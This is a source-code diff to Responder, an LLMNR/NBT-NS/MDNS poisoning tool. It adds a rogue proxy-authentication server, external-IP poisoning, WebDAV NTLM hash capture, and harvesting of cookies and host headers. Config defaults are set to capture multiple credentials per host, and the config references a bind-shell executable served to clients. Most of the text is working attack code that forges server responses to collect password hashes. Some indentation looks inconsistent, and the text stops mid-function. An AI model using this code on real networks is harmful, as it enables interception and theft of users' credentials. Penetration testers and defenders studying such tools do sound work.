updated version number

.gitignore

@@ -2,4 +2,4 @@
 *.db
 *.txt
 *.log
-logs/*
+

README.md

@@ -89,7 +89,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c
 
 ## Considerations ##
 
-- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.
+- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
 
 - If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
 
@@ -121,7 +121,7 @@ Running the tool:
 
 Typical Usage Example:
 
-    ./Responder.py -I eth0 -rFv
+    ./Responder.py -I eth0 -rPv
 
 Options:
 
@@ -131,6 +131,11 @@ Options:
 	                        BROWSER, LLMNR requests without responding.
 	  -I eth0, --interface=eth0
 	                        Network interface to use.
+          -i 10.0.0.21, --ip=10.0.0.21
+                                Local IP to use (only for OSX)
+          -e 10.0.0.22, --externalip=10.0.0.22
+                                Poison all requests with another IP address than
+                                Responder's one.
 	  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
 	  -r, --wredir          Enable answers for netbios wredir suffix queries.
 	                        Answering to wredir will likely break stuff on the
@@ -148,8 +153,12 @@ Options:
 	  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
 	                        retrieval. This may cause a login prompt. Default:
 	                        Off
+	  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt) 
+                                authentication for the proxy. WPAD doesn't need to
+                                be ON. This option is highly effective when combined
+                                with -r. Default: Off
 	  --lm                  Force LM hashing downgrade for Windows XP/2003 and
-	                        earlier. Default: False
+	                        earlier. Default: Off
 	  -v, --verbose         Increase verbosity.
 	
 

Responder.conf

@@ -42,20 +42,25 @@ RespondToName =
 
 ; Specific IP Addresses not to respond to (default = None)
 ; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
-DontRespondTo = 
+DontRespondTo =
 
 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
 ; Example: DontRespondTo = NAC, IPS, IDS
-DontRespondToName =
+DontRespondToName = ISATAP
 
 ; If set to On, we will stop answering further requests from a host
-; if a hash hash been previously captured for this host.
+; if a hash has been previously captured for this host.
 AutoIgnoreAfterSuccess = Off
 
 ; If set to On, we will send ACCOUNT_DISABLED when the client tries
 ; to authenticate for the first time to try to get different credentials.
 ; This may break file serving and is useful only for hash capture
-CaptureMultipleCredentials = Off
+CaptureMultipleCredentials = On
+
+; If set to On, we will write to file all hashes captured from the same host. 
+; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto, 
+; domain\popo, domain\zozo. Recommended value: On, capture everything.
+CaptureMultipleHashFromSameHost = On
 
 [HTTP Server]
 
@@ -79,7 +84,7 @@ ExeFilename = files/BindShell.exe
 ExeDownloadName = ProxyClient.exe
 
 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
+WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
 
 ; HTML answer to inject in HTTP responses (before </body> tag).
 ; Set to an empty string to disable.

Responder.py

@@ -20,13 +20,16 @@ import ssl
 from SocketServer import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
-
+import struct
 banner()
 
 parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
 parser.add_option('-A','--analyze',        action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
-parser.add_option('-I','--interface',      action="store",      help="Network interface to use", dest="Interface", metavar="eth0", default=None)
-parser.add_option('-i','--ip',      action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
+parser.add_option('-I','--interface',      action="store",      help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None)
+parser.add_option('-i','--ip',             action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
+
+parser.add_option('-e', "--externalip",    action="store",      help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP",  metavar="10.0.0.22", default=None)
+
 parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
 parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
 parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
@@ -34,6 +37,9 @@ parser.add_option('-f','--fingerprint',    action="store_true", help="This optio
 parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
 parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
 parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
+
+parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
+
 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
 options, args = parser.parse_args()
@@ -74,6 +80,16 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 				pass
 		TCPServer.server_bind(self)
 
+class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
+	def server_bind(self):
+		if OsInterfaceIsSupported():
+			try:
+				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+			except:
+				pass
+                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+		TCPServer.server_bind(self)
+
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.251"
@@ -110,6 +126,7 @@ ThreadingUDPServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 ThreadingUDPMDNSServer.allow_reuse_address = 1
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
+ThreadingTCPServerAuth.allow_reuse_address = 1
 
 def serve_thread_udp_broadcast(host, port, handler):
 	try:
@@ -157,6 +174,17 @@ def serve_thread_tcp(host, port, handler):
 	except:
 		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
 
+def serve_thread_tcp_auth(host, port, handler):
+	try:
+		if OsInterfaceIsSupported():
+			server = ThreadingTCPServerAuth((settings.Config.Bind_To, port), handler)
+			server.serve_forever()
+		else:
+			server = ThreadingTCPServerAuth((host, port), handler)
+			server.serve_forever()
+	except:
+		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+
 def serve_thread_SSL(host, port, handler):
 	try:
 
@@ -202,6 +230,10 @@ def main():
 			from servers.HTTP_Proxy import HTTP_Proxy
 			threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
 
+		if settings.Config.ProxyAuth_On_Off:
+		        from servers.Proxy_Auth import Proxy_Auth
+		        threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,)))
+
 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:
 				from servers.SMB import SMB1LM

packets.py

@@ -19,6 +19,7 @@ import settings
 
 from base64 import b64decode, b64encode
 from odict import OrderedDict
+from utils import HTTPCurrentDate, RespondWithIPAton
 
 # Packet class handling all packet generation (see odict.py).
 class Packet():
@@ -56,7 +57,7 @@ class NBT_Ans(Packet):
 	def calculate(self,data):
 		self.fields["Tid"] = data[0:2]
 		self.fields["NbtName"] = data[12:46]
-		self.fields["IP"] = settings.Config.IP_aton
+                self.fields["IP"] = RespondWithIPAton()
 
 # DNS Answer Packet
 class DNS_Ans(Packet):
@@ -82,7 +83,7 @@ class DNS_Ans(Packet):
 	def calculate(self,data):
 		self.fields["Tid"] = data[0:2]
 		self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
-		self.fields["IP"] = settings.Config.IP_aton
+                self.fields["IP"] = RespondWithIPAton()
 		self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
 
 # LLMNR Answer Packet
@@ -110,7 +111,7 @@ class LLMNR_Ans(Packet):
 	])
 
 	def calculate(self):
-		self.fields["IP"] = settings.Config.IP_aton
+                self.fields["IP"] = RespondWithIPAton()
 		self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
 		self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1]
 		self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1]
@@ -204,11 +205,10 @@ class NTLM_Challenge(Packet):
 class IIS_Auth_401_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
-		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
@@ -216,11 +216,10 @@ class IIS_Auth_401_Ans(Packet):
 class IIS_Auth_Granted(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
-		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
 		("CRLF",          "\r\n\r\n"),
@@ -232,13 +231,12 @@ class IIS_Auth_Granted(Packet):
 class IIS_NTLM_Challenge_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWWAuth",       "WWW-Authenticate: NTLM "),
 		("Payload",       ""),
 		("Payload-CRLF",  "\r\n"),
-		("PoweredBy",     "X-Powered-By: ASP.NC0CD7B7802C76736E9B26FB19BEB2D36290B9FF9A46EDDA5ET\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
@@ -249,11 +247,10 @@ class IIS_NTLM_Challenge_Ans(Packet):
 class IIS_Basic_401_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
-		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("AllowOrigin",   "Access-Control-Allow-Origin: *\r\n"),
 		("AllowCreds",    "Access-Control-Allow-Credentials: true\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
@@ -264,10 +261,9 @@ class IIS_Basic_401_Ans(Packet):
 class WPADScript(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
-		("ServerTlype",    "Server: Microsoft-IIS/6.0\r\n"),
-		("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+		("ServerTlype",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
-		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
 		("CRLF",          "\r\n\r\n"),
@@ -280,16 +276,15 @@ class ServeExeFile(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
 		("ContentType",   "Content-Type: application/octet-stream\r\n"),
-		("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+		("LastModified",  "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
 		("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
 		("Server",        "Server: Microsoft-IIS/7.5\r\n"),
-		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("ContentDisp",   "Content-Disposition: attachment; filename="),
 		("ContentDiFile", ""),
 		("FileCRLF",      ";\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
-		("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+		("Date",          "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
 		("Connection",    "Connection: keep-alive\r\n"),
 		("X-CCC",         "US\r\n"),
 		("X-CID",         "2\r\n"),
@@ -303,13 +298,12 @@ class ServeHtmlFile(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 200 OK\r\n"),
 		("ContentType",   "Content-Type: text/html\r\n"),
-		("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+		("LastModified",  "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
 		("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
 		("Server",        "Server: Microsoft-IIS/7.5\r\n"),
-		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"),
-		("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+		("Date",          "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
 		("Connection",    "Connection: keep-alive\r\n"),
 		("CRLF",          "\r\n"),
 		("Payload",       "jj"),
@@ -317,6 +311,68 @@ class ServeHtmlFile(Packet):
 	def calculate(self):
 		self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 
+##### WPAD Auth Packets #####
+class WPAD_Auth_407_Ans(Packet):
+	fields = OrderedDict([
+		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("Type",          "Content-Type: text/html\r\n"),
+		("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
+		("Connection",    "Proxy-Connection: close\r\n"),
+		("Cache-Control",    "Cache-Control: no-cache\r\n"),
+		("Pragma",        "Pragma: no-cache\r\n"),
+		("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
+		("Len",           "Content-Length: 0\r\n"),
+		("CRLF",          "\r\n"),
+	])
+
+
+class WPAD_NTLM_Challenge_Ans(Packet):
+	fields = OrderedDict([
+		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("Type",          "Content-Type: text/html\r\n"),
+		("WWWAuth",       "Proxy-Authenticate: NTLM "),
+		("Payload",       ""),
+		("Payload-CRLF",  "\r\n"),
+		("Len",           "Content-Length: 0\r\n"),
+		("CRLF",          "\r\n"),
+	])
+
+	def calculate(self,payload):
+		self.fields["Payload"] = b64encode(payload)
+
+class WPAD_Basic_407_Ans(Packet):
+	fields = OrderedDict([
+		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("Type",          "Content-Type: text/html\r\n"),
+		("WWW-Auth",      "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
+		("Connection",    "Proxy-Connection: close\r\n"),
+		("Cache-Control",    "Cache-Control: no-cache\r\n"),
+		("Pragma",        "Pragma: no-cache\r\n"),
+		("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
+		("Len",           "Content-Length: 0\r\n"),
+		("CRLF",          "\r\n"),
+	])
+
+##### WEB Dav Stuff #####
+class WEBDAV_Options_Answer(Packet):
+	fields = OrderedDict([
+		("Code",          "HTTP/1.1 200 OK\r\n"),
+		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+		("Allow",         "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
+		("Len",           "Content-Length: 0\r\n"),
+		("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
+		("Connection",    "Connection: Keep-Alive\r\n"),
+		("Content-Type",  "Content-Type: text/html\r\n"),
+		("CRLF",          "\r\n"),
+	])
+
 ##### FTP Packets #####
 class FTPPacket(Packet):
 	fields = OrderedDict([
@@ -1540,3 +1596,5 @@ class SMB2Session2Data(Packet):
 		("SecBlobOffSet",   "\x00\x00\x00\x00"),
     ])
 
+
+

poisoners/MDNS.py

@@ -36,7 +36,6 @@ def Poisoned_MDNS_Name(data):
 	data = data[12:]
 	return data[:len(data)-5]
 
-
 class MDNS(BaseRequestHandler):
 	def handle(self):
 		MADDR = "224.0.0.251"
@@ -56,7 +55,7 @@ class MDNS(BaseRequestHandler):
 			if Parse_IPV6_Addr(data):
 
 				Poisoned_Name = Poisoned_MDNS_Name(data)
-				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
+				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton())
 				Buffer.calculate()
 				soc.sendto(str(Buffer), (MADDR, MPORT))
 

servers/HTTP.py

@@ -14,18 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
 from SocketServer import BaseRequestHandler, StreamRequestHandler
 from base64 import b64decode
-import struct
 from utils import *
 
 from packets import NTLM_Challenge
-from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer
 from packets import WPADScript, ServeExeFile, ServeHtmlFile
 
 
 # Parse NTLMv1/v2 hash.
-def ParseHTTPHash(data, client):
+def ParseHTTPHash(data, client, module):
 	LMhashLen    = struct.unpack('<H',data[12:14])[0]
 	LMhashOffset = struct.unpack('<H',data[16:18])[0]
 	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
@@ -43,9 +43,8 @@ def ParseHTTPHash(data, client):
 		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
 		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
 		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
-
 		SaveToDb({
-			'module': 'HTTP', 
+			'module': module, 
 			'type': 'NTLMv1', 
 			'client': client, 
 			'host': HostName, 
@@ -63,9 +62,9 @@ def ParseHTTPHash(data, client):
 		HostNameOffset = struct.unpack('<H',data[48:50])[0]
 		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
 		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
-
+                 
 		SaveToDb({
-			'module': 'HTTP', 
+			'module': module, 
 			'type': 'NTLMv2', 
 			'client': client, 
 			'host': HostName, 
@@ -104,14 +103,46 @@ def GrabReferer(data, host):
 		return Referer
 	return False
 
+def SpotFirefox(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+	if UserAgent:
+                print text("[HTTP] %s" % color("User-Agent        : "+UserAgent[0], 2))
+                IsFirefox = re.search('Firefox', UserAgent[0])
+                if IsFirefox:
+                        print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1)
+                        print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1)
+                        return True
+                else:
+	               return False
+
 def WpadCustom(data, client):
 	Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
-	if Wpad:
+	if Wpad and SpotFirefox(data):
+		Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
+		Buffer.calculate()
+		return str(Buffer)
+
+	if Wpad and SpotFirefox(data) == False:
 		Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
 		Buffer.calculate()
 		return str(Buffer)
 	return False
 
+def IsWebDAV(data):
+        dav = re.search('PROPFIND', data)
+        if dav:
+              return True
+        else:
+              return False
+
+def ServeOPTIONS(data):
+	WebDav= re.search('OPTIONS', data)
+	if WebDav:
+		Buffer = WEBDAV_Options_Answer()
+		return str(Buffer)
+
+	return False
+
 def ServeFile(Filename):
 	with open (Filename, "rb") as bk:
 		return bk.read()
@@ -125,7 +156,6 @@ def RespondWithFile(client, filename, dlname=None):
 
 	Buffer.calculate()
 	print text("[HTTP] Sending file %s to %s" % (filename, client))
-
 	return str(Buffer)
 
 def GrabURL(data, host):
@@ -138,6 +168,7 @@ def GrabURL(data, host):
 
 	if POST and settings.Config.Verbose:
 		print text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5)))
+
 		if len(''.join(POSTDATA)) > 2:
 			print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
 
@@ -155,10 +186,12 @@ def PacketSequence(data, client):
 		return RespondWithFile(client, settings.Config.Html_Filename)
 
 	WPAD_Custom = WpadCustom(data, client)
-	
+        # Webdav
+        if ServeOPTIONS(data):
+                return ServeOPTIONS(data)
+
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-
 		if Packet_NTLM == "\x01":
 			GrabURL(data, client)
 			GrabReferer(data, client)
@@ -170,15 +203,19 @@ def PacketSequence(data, client):
 
 			Buffer_Ans = IIS_NTLM_Challenge_Ans()
 			Buffer_Ans.calculate(str(Buffer))
-
 			return str(Buffer_Ans)
 
 		if Packet_NTLM == "\x03":
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-			ParseHTTPHash(NTLM_Auth, client)
+                        if IsWebDAV(data):
+                                 module = "WebDAV"
+                        else:
+                                 module = "HTTP"
+			ParseHTTPHash(NTLM_Auth, client, module)
 
 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+
 				return WPAD_Custom
 			else:
 				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
@@ -204,6 +241,7 @@ def PacketSequence(data, client):
 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
 				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+
 			return WPAD_Custom
 		else:
 			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
@@ -214,18 +252,21 @@ def PacketSequence(data, client):
 			Response = IIS_Basic_401_Ans()
 			if settings.Config.Verbose:
 				print text("[HTTP] Sending BASIC authentication request to %s" % client)
+
 		else:
 			Response = IIS_Auth_401_Ans()
 			if settings.Config.Verbose:
 				print text("[HTTP] Sending NTLM authentication request to %s" % client)
+
 		return str(Response)
 
 # HTTP Server class
 class HTTP(BaseRequestHandler):
+
 	def handle(self):
 		try:
-			while True:
-				self.request.settimeout(1)
+                	for x in range(2):   
+				self.request.settimeout(3)
 				data = self.request.recv(8092)
 				Buffer = WpadCustom(data, self.client_address[0])
 
@@ -249,19 +290,18 @@ class HTTPS(StreamRequestHandler):
 
 	def handle(self):
 		try:
-			while True:
-				data = self.exchange.recv(8092)
-				self.exchange.settimeout(0.5)
-				Buffer = WpadCustom(data,self.client_address[0])
+			data = self.exchange.recv(8092)
+			self.exchange.settimeout(0.5)
+			Buffer = WpadCustom(data,self.client_address[0])
 				
-				if Buffer and settings.Config.Force_WPAD_Auth == False:
-					self.exchange.send(Buffer)
-					if settings.Config.Verbose:
-						print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
+			if Buffer and settings.Config.Force_WPAD_Auth == False:
+				self.exchange.send(Buffer)
+				if settings.Config.Verbose:
+					print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
 
-				else:
-					Buffer = PacketSequence(data,self.client_address[0])
-					self.exchange.send(Buffer)
+			else:
+				Buffer = PacketSequence(data,self.client_address[0])
+				self.exchange.send(Buffer)
 		except:
 			pass
 

servers/HTTP_Proxy.py

@@ -344,3 +344,4 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 	do_POST = do_GET
 	do_PUT  = do_GET
 	do_DELETE=do_GET
+

servers/MSSQL.py

@@ -146,5 +146,6 @@ class MSSQL(BaseRequestHandler):
 				if data[0] == "\x11":  # NegoSSP Auth
 					ParseSQLHash(data,self.client_address[0])
 
-		except socket.timeout:
+		except:
 			self.request.close()
+                        pass

servers/Proxy_Auth.py

@@ -0,0 +1,111 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import SocketServer
+from HTTP import ParseHTTPHash
+from packets import *
+from utils import *
+
+def GrabUserAgent(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+        if UserAgent:
+           print text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2))
+
+def GrabCookie(data):
+	Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
+
+	if Cookie:
+		Cookie = Cookie.group(0).replace('Cookie: ', '')
+		if len(Cookie) > 1:
+                        if settings.Config.Verbose:
+			        print text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2))
+
+		return Cookie
+	return False
+
+def GrabHost(data):
+	Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
+
+	if Host:
+		Host = Host.group(0).replace('Host: ', '')
+                if settings.Config.Verbose:
+		        print text("[Proxy-Auth] %s" % color("Host             : "+Host, 2))
+
+		return Host
+	return False
+
+def PacketSequence(data, client):
+	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)	
+	if NTLM_Auth:
+		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+		if Packet_NTLM == "\x01":
+			if settings.Config.Verbose:
+				print text("[Proxy-Auth] Sending NTLM authentication request to %s" % client)
+
+			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
+			Buffer.calculate()
+			Buffer_Ans = WPAD_NTLM_Challenge_Ans()
+			Buffer_Ans.calculate(str(Buffer))
+			return str(Buffer_Ans)
+		if Packet_NTLM == "\x03":
+			NTLM_Auth = b64decode(''.join(NTLM_Auth))
+       	                ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
+                        GrabUserAgent(data)
+                        GrabCookie(data)
+                        GrabHost(data)
+   	                return False #Send a RST with SO_LINGER when close() is called (see Responder.py)
+		else:
+               		return False
+
+	elif Basic_Auth:
+                GrabUserAgent(data)
+                GrabCookie(data)
+                GrabHost(data)
